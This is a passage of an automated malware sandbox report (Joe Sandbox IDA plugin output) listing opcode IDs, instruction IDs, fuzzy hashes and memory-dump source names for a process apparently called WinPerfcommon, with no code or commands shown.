                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 64c8416027a62cc8dadcbbc9aad47d9f8926d9ad944dce289991068a64ff0a8d
                                                                                      • Instruction ID: 70c63a4cd34bc702b284a19e7757628a40e137b73e8e10f3f99b0fe32d4ab479
                                                                                      • Opcode Fuzzy Hash: 64c8416027a62cc8dadcbbc9aad47d9f8926d9ad944dce289991068a64ff0a8d
                                                                                      • Instruction Fuzzy Hash: 58C1F230B0DA4A9FE759DB68C0A16A8B7A1FF59300F1551BDC04EC7A96CB38B951CB80
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 284d3dcfa009c461da2e8128e690322552724cb3363ad3a89cc7bd42fd64ab74
                                                                                      • Instruction ID: ee3b35869dd6de4bdbf6d3a47d2dfa208ef069d5cb31cb41a64515224b54b6c6
                                                                                      • Opcode Fuzzy Hash: 284d3dcfa009c461da2e8128e690322552724cb3363ad3a89cc7bd42fd64ab74
                                                                                      • Instruction Fuzzy Hash: 7EA1203164C94D8FDF98EF68C4A8E6977E1FF69301B1545A9D40AC72A2DE20FD80CB81
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c5cf9cc8ec4c4530859f257a86ed838e1bc6c4a230841d17ae87f9ad09425b58
                                                                                      • Instruction ID: 4765ca7275a4977e664082e8fa8091bf3d8d8ac67912201b06e863ea3b8bb429
                                                                                      • Opcode Fuzzy Hash: c5cf9cc8ec4c4530859f257a86ed838e1bc6c4a230841d17ae87f9ad09425b58
                                                                                      • Instruction Fuzzy Hash: 74918F3560E58D4FD378DA7888655BD37D0FF45310B0612B9D09ED75B3DD28AA068F81
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 24b6b1c0de40cbad4ff1815e04d89dcb6dfeb561a2c237e511d17aa45ba3fc25
                                                                                      • Instruction ID: 23f1dbc62957556a9d09fdc31c3ae67a6709db9c9ba71edfb508f69c5df8ab3b
                                                                                      • Opcode Fuzzy Hash: 24b6b1c0de40cbad4ff1815e04d89dcb6dfeb561a2c237e511d17aa45ba3fc25
                                                                                      • Instruction Fuzzy Hash: 0C21D693F0F19F86F7356AF828351FC26409F85320F7B25BBD44DA61E6DC0C2A461282
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 12ff8e56cfcd92b783dde78e31b9a021b319ebc78bacc3cc7f9066b7661d94ae
                                                                                      • Instruction ID: 2a98f0a456da69373148e663046581af3f908fc963544847f114f9d041e61d49
                                                                                      • Opcode Fuzzy Hash: 12ff8e56cfcd92b783dde78e31b9a021b319ebc78bacc3cc7f9066b7661d94ae
                                                                                      • Instruction Fuzzy Hash: C1A1353060DA4A8FE759DF68C0A46B8B7E0FF44300F5551B9C04EC7AA6DB68F952CB90
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 912892ef12d2445afc1b92b4290e6a7d57d6b5486d25ec12030e1668b482c78d
                                                                                      • Instruction ID: c305bd70c3aee5733ae9e93c9741b2a11b8541d2787ee5fe7ce7b7cd9403dd5b
                                                                                      • Opcode Fuzzy Hash: 912892ef12d2445afc1b92b4290e6a7d57d6b5486d25ec12030e1668b482c78d
                                                                                      • Instruction Fuzzy Hash: 4B11B112F1F5DF8AF67896F524311BC5E805F90710F5B62BAD44EA60E6DC4C2B852386
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 16bf928b6e97c867995df393a2442e4a73e560e4eca285279704f6964f2dce63
                                                                                      • Instruction ID: 05933c6ecb03a1006a2a4cd4970d261d1eacf27fcec1416144ed522a418c9fc8
                                                                                      • Opcode Fuzzy Hash: 16bf928b6e97c867995df393a2442e4a73e560e4eca285279704f6964f2dce63
                                                                                      • Instruction Fuzzy Hash: 6B715870B0D7894FE32D9F3898651797BE0EF46310F15007EE8CFD72A2DA24A9028796
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4369a4586613f089385a2e7383d75b28b9970e5cacc2d0bb4a95548b23c01079
                                                                                      • Instruction ID: c0c936267e4870cffc63b7f5232a3f9c0a09cbf624c45f76e3f828caf99af1de
                                                                                      • Opcode Fuzzy Hash: 4369a4586613f089385a2e7383d75b28b9970e5cacc2d0bb4a95548b23c01079
                                                                                      • Instruction Fuzzy Hash: 10118212F1F6CF8AF37996F4143417C5D905F91720F1B62BAD44DA61E6EC4C2A446382
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ac63ceada945b3aece900870d87e3c3d52bd6f249b691e626defd4d822afc701
                                                                                      • Instruction ID: ec0cb5481523d08b25142a9da7bf3b852d6d36c54c4ccff102ea204f5a679d8c
                                                                                      • Opcode Fuzzy Hash: ac63ceada945b3aece900870d87e3c3d52bd6f249b691e626defd4d822afc701
                                                                                      • Instruction Fuzzy Hash: EE817A31B0EB4A4FE3399BB8846117D77E0EF85310B16157ED48FD31A2CE28BA428752
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4bf66b0f52212907599547eec93ab9014fdf1e55b8f454597ed5a0e5f6a79942
                                                                                      • Instruction ID: b421419308a1ba756ded4a800aedbe712006f48ab1175683dddeca63a58a16f2
                                                                                      • Opcode Fuzzy Hash: 4bf66b0f52212907599547eec93ab9014fdf1e55b8f454597ed5a0e5f6a79942
                                                                                      • Instruction Fuzzy Hash: 2C815931B0EA4A8FE3389A78986157D77E0EF41310B16557ED48FE31E2DE28BA428741
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: df5275d2cde7ee8863d061afcd287febaf9b34a8831fdaffc7e3288db17168c9
                                                                                      • Instruction ID: c3ef158b0037c01a47e0770464a283c77aac1a95b48efe5f39a99c41872d45d8
                                                                                      • Opcode Fuzzy Hash: df5275d2cde7ee8863d061afcd287febaf9b34a8831fdaffc7e3288db17168c9
                                                                                      • Instruction Fuzzy Hash: 74712731B0F68A4FE726DBB4C8716A83BA1EF52710F1A41F7C448DB1E7C928A9458391
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6aebe91685924ee3a7e717c4a02a87c43c2df6e17645858fcd61ee1b714ff7e9
                                                                                      • Instruction ID: d1300a62ee467065e7c3d14cb1b1e822bd68761a1e5ceae60b9ff085d3b0e55d
                                                                                      • Opcode Fuzzy Hash: 6aebe91685924ee3a7e717c4a02a87c43c2df6e17645858fcd61ee1b714ff7e9
                                                                                      • Instruction Fuzzy Hash: 3771D335E1D54E8EEB65DBF488646FC7BB1FF49314F2105B9D00EEB1A1DA286A41C740
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 33383d3051f9adb4a2a175f06a8d945b63972d6d23f890750cb5366a160263aa
                                                                                      • Instruction ID: b1772d247554f4b9b2fbb6f5538fe3cefcd4e4241a93c2e7d9550fd299f8c8d2
                                                                                      • Opcode Fuzzy Hash: 33383d3051f9adb4a2a175f06a8d945b63972d6d23f890750cb5366a160263aa
                                                                                      • Instruction Fuzzy Hash: F2712731A0E58D4FD778EB7888765BD37D0EF4531070612B9E49EC75B2DE18AA068781
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1d12cc45da147a7c740998dcb1445edfa0958370283fea18d420984ea422e4be
                                                                                      • Instruction ID: 9f218ba86a20deda4588fb8293d73b03b1ec7f327a0b87cb898db6ac10f9857b
                                                                                      • Opcode Fuzzy Hash: 1d12cc45da147a7c740998dcb1445edfa0958370283fea18d420984ea422e4be
                                                                                      • Instruction Fuzzy Hash: 5571D470E1D64E8EEB66DBB488646BC7BB1EF45300F1100BBD01EE71E2EE286A45C751
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4284f029f71f22f3a3e9e61c7473a4f0844f4448dd3f5aff0c71d6d29253c6a9
                                                                                      • Instruction ID: 076563bd5fa55ce25ffdbbc4c112bd698f294052232d6ac58fdebe060d42a14f
                                                                                      • Opcode Fuzzy Hash: 4284f029f71f22f3a3e9e61c7473a4f0844f4448dd3f5aff0c71d6d29253c6a9
                                                                                      • Instruction Fuzzy Hash: CD51B130B1994B8BE798EF68C0A16B8B791FF58300F559579C01EC7AD6DB34F9518B80
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1817243924.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b800000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a539b0af57a56583580d506aa6bc146903a99ba81b43c7a122b4e1b9ba783ef7
                                                                                      • Instruction ID: 2761759e81947a5093958c23de8481e57aebe09574555968010ddb6069de3958
                                                                                      • Opcode Fuzzy Hash: a539b0af57a56583580d506aa6bc146903a99ba81b43c7a122b4e1b9ba783ef7
                                                                                      • Instruction Fuzzy Hash: 9131253170D9194FE768EB5CE89AAB977D0FF8932170601BAE4CAC7176DD11AC8287C1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7412e531a64bb2b1160596a515f09f9513d56622e7e0bf2dfa9c05353a0e0d8e
                                                                                      • Instruction ID: 6e488cb6add653154efb24063d94a978fa5ce0f03781afa0610659970d3862ed
                                                                                      • Opcode Fuzzy Hash: 7412e531a64bb2b1160596a515f09f9513d56622e7e0bf2dfa9c05353a0e0d8e
                                                                                      • Instruction Fuzzy Hash: F941523160D9498FDF58EF6CC4A5DA977E1FBA9320B0505AED05EC3292DE21F885CB81
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5736cd721de71bebe0fb3f1faf38f30f37ee3a08b619418528994395c048c457
                                                                                      • Instruction ID: 2c4189bd8525f065b3fd25b6b6a489095b374764cdd16dbb9a6050372acdc2e4
                                                                                      • Opcode Fuzzy Hash: 5736cd721de71bebe0fb3f1faf38f30f37ee3a08b619418528994395c048c457
                                                                                      • Instruction Fuzzy Hash: 2641623260C9498FDF99EB6CC4A5DB877E1FBA831074505AED04EC32A2DE25F845CB81
                                                                                      • Instruction ID: 88c461467ace69dbae74fa174cf67fbadfa59333b043e1e4dd5386f3e9c6c3e9
                                                                                      • Opcode Fuzzy Hash: 54ed7f765b350fe6e22b9e36395c1eb68ac85298de9d6f715fd7012f40802a36
                                                                                      • Instruction Fuzzy Hash: FB212C26F1E28D8AE311A7B898250EC3770DF46365F1681B3D084C61E3DD382646C791
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 63806c678a81082969a610564ab2183a782b20b42148a873e0a574d7b4fd75e3
                                                                                      • Instruction ID: 6d22079ac12980c50b60509f4fb72a78bc9fdd579f66d2bda03deba87ccb1be6
                                                                                      • Opcode Fuzzy Hash: 63806c678a81082969a610564ab2183a782b20b42148a873e0a574d7b4fd75e3
                                                                                      • Instruction Fuzzy Hash: 2A21FB31E1991D8FDF99EB58C4A5AFCB7B1FF58314F0101AAD00EE3295CA35AA41CB40
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d2f26ef8bae4e3daf16b3c476d84548470b3e95082acfbf02a35374d7b756d93
                                                                                      • Instruction ID: 300e8cfdbf3e3a8b671b97859855beb74e78a2003f94931a5e021d8d2dd4c8ea
                                                                                      • Opcode Fuzzy Hash: d2f26ef8bae4e3daf16b3c476d84548470b3e95082acfbf02a35374d7b756d93
                                                                                      • Instruction Fuzzy Hash: 3821D335F0C64D8FEBA8DBA8C8A567DB3E1FF49315F0110B9D04ED75A1CA25AD418B50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 359e2a530973b36d51bd97db3cdbef6a34574cde56492dbcb0a56944e6a710e5
                                                                                      • Instruction ID: a894aabc5675d2d0eadaa0a6ac83107b97cb6debc30a8044784261e2306c9eb2
                                                                                      • Opcode Fuzzy Hash: 359e2a530973b36d51bd97db3cdbef6a34574cde56492dbcb0a56944e6a710e5
                                                                                      • Instruction Fuzzy Hash: D1214C71A1D95E8FDB94DFA8C8605FCBBB1FF58300F51117AE01AE72A1DA256905C710
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 075151e7d65fedfe6e076cbc894ab027a923c2fce27649d8ab1cc7243d13fdc4
                                                                                      • Instruction ID: f978d6aaa263d423a35bc97eb9658df4aadafb7205021dd23a3a3dcdb5f6a400
                                                                                      • Opcode Fuzzy Hash: 075151e7d65fedfe6e076cbc894ab027a923c2fce27649d8ab1cc7243d13fdc4
                                                                                      • Instruction Fuzzy Hash: 6211E471A1EA584FEB55FBF498665EC77A0EF1A310F05017DC04AD71E3DA286946C700
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3786debcf463240d93e227b12791d4fc8878b45f63f08dc519477eb647291f35
                                                                                      • Instruction ID: 2c1210f38ef392cc61e7ae70969c2efde1e7435efa002cd189cc1253cfa1701c
                                                                                      • Opcode Fuzzy Hash: 3786debcf463240d93e227b12791d4fc8878b45f63f08dc519477eb647291f35
                                                                                      • Instruction Fuzzy Hash: 7821D820B1D46F46F738C26880705FC7291EF90305B6A9679D05FDB6EAD82CBA829780
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ffc118af2fba2a1dd972b898873a5e6bf387a0bfb547f92f2b59d80308413930
                                                                                      • Instruction ID: 6d5f1f31a327c8c23f4c6b389af9ebdf138473441d68d1d51656d8a69a6dae3f
                                                                                      • Opcode Fuzzy Hash: ffc118af2fba2a1dd972b898873a5e6bf387a0bfb547f92f2b59d80308413930
                                                                                      • Instruction Fuzzy Hash: D4118130B08A1C8FDB98DF58D895AA8B3E1FF59315F0141AED04ED76A6CA31AD41CB41
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fcb0121ec5dc2ec4c79e7e7dc05fe9950ec0c50fa80b4d66e49f61cb7448ca32
                                                                                      • Instruction ID: 2c603052753575c5222d4868c242bfb6b0c224bb4ed066b77c550a579d0a7456
                                                                                      • Opcode Fuzzy Hash: fcb0121ec5dc2ec4c79e7e7dc05fe9950ec0c50fa80b4d66e49f61cb7448ca32
                                                                                      • Instruction Fuzzy Hash: 0A211D71E1950D9FDB9CDB68C4A5AADB7B1FF58301F0111BDE00EE76A1DE34A9418B40
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1817243924.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b800000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3cfb3965a07063da61d04dff133bb35125a4e0362b95e8ef55e663e6a1d0cca1
                                                                                      • Instruction ID: 6ae7605a8170bfe91c3aca2b3081d18aa69362ef7a290f2e8a02ca9b90dbea95
                                                                                      • Opcode Fuzzy Hash: 3cfb3965a07063da61d04dff133bb35125a4e0362b95e8ef55e663e6a1d0cca1
                                                                                      • Instruction Fuzzy Hash: E8215430F2D90D8BE7B4EB5494A66F97391FF4C741F5101B5D88DD32B2EE286E444681
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4f39207a5259421dcd0c5abefe902dc7ac54ac2673b61d1db63457159401ed4e
                                                                                      • Instruction ID: c4471b37d5c96606ac1053ad93fb27d234d036698693c1b3764aab41e9fd96b0
                                                                                      • Opcode Fuzzy Hash: 4f39207a5259421dcd0c5abefe902dc7ac54ac2673b61d1db63457159401ed4e
                                                                                      • Instruction Fuzzy Hash: 47113D10A1D42E87F73C82A840709BC7795FF90300B159579E0AB974FAC83CBA8193C0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 17662f2b8418c96938b10e79778d76e1c84806681317de2ed3fc2d7fd79c8626
                                                                                      • Instruction ID: 2a1b46a0fbfa16f9280d34e25f3f5e05ea03ddc62f9ac2dc50a5bd9fb95f4088
                                                                                      • Opcode Fuzzy Hash: 17662f2b8418c96938b10e79778d76e1c84806681317de2ed3fc2d7fd79c8626
                                                                                      • Instruction Fuzzy Hash: B5112B10B2E46E56F63CCA5890B44BC7391FB91302B16567DC45B9B4AAC92CFAC1DB80
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 71ab0fca097b17464cfc172dacdc42311caab825ab3144fbd571b1418ee35db9
                                                                                      • Instruction ID: 64fab1e3cfacc336a907e279ae06c6b7bd0b4aa2f6db394a850d62906dd04f35
                                                                                      • Opcode Fuzzy Hash: 71ab0fca097b17464cfc172dacdc42311caab825ab3144fbd571b1418ee35db9
                                                                                      • Instruction Fuzzy Hash: 4A115732A0A28D5FE76197F088281BA3BB1DF16340F0600B6D44AEB1A2CD68294AC361
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1edde3efc25dab581658cc08277b731d80ab52fa3edc3516c1700531ab753175
                                                                                      • Instruction ID: ec8e897787384456051890da7b712ddea146aa18661dce7b737606d09eb6380c
                                                                                      • Opcode Fuzzy Hash: 1edde3efc25dab581658cc08277b731d80ab52fa3edc3516c1700531ab753175
                                                                                      • Instruction Fuzzy Hash: 8611A731B09A1C8FD758DF68D8A96BCB3E1FF59315B0101BED04ED75A1CA216941CB11
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 15d1401b03f0a1b4e0d877405d262f2a90a9d3b8d4ce8acfb52677305ff0982d
                                                                                      • Instruction ID: c3014572cc03b9656545f1396edf650a61ffd3bf46e9ee3770e0c5358a9790cf
                                                                                      • Opcode Fuzzy Hash: 15d1401b03f0a1b4e0d877405d262f2a90a9d3b8d4ce8acfb52677305ff0982d
                                                                                      • Instruction Fuzzy Hash: 90110430B19A4D8EDB65EB7584248FA73E0EF58341B41057AD40FC75E2CE28BA468790
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 068c0f1e74306bcd9dc4cc8b391f9725ff30a8cb451fb5103dfc846617edc4d5
                                                                                      • Instruction ID: 68ce5185241460502dff4a1b01ced0c43dd343c04a69273f2d43be6968d82e57
                                                                                      • Opcode Fuzzy Hash: 068c0f1e74306bcd9dc4cc8b391f9725ff30a8cb451fb5103dfc846617edc4d5
                                                                                      • Instruction Fuzzy Hash: 71110131B19A4E8FDBA5EB7094218FD73A0EF54351B41057AD40FC75E2CE28BA458750
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
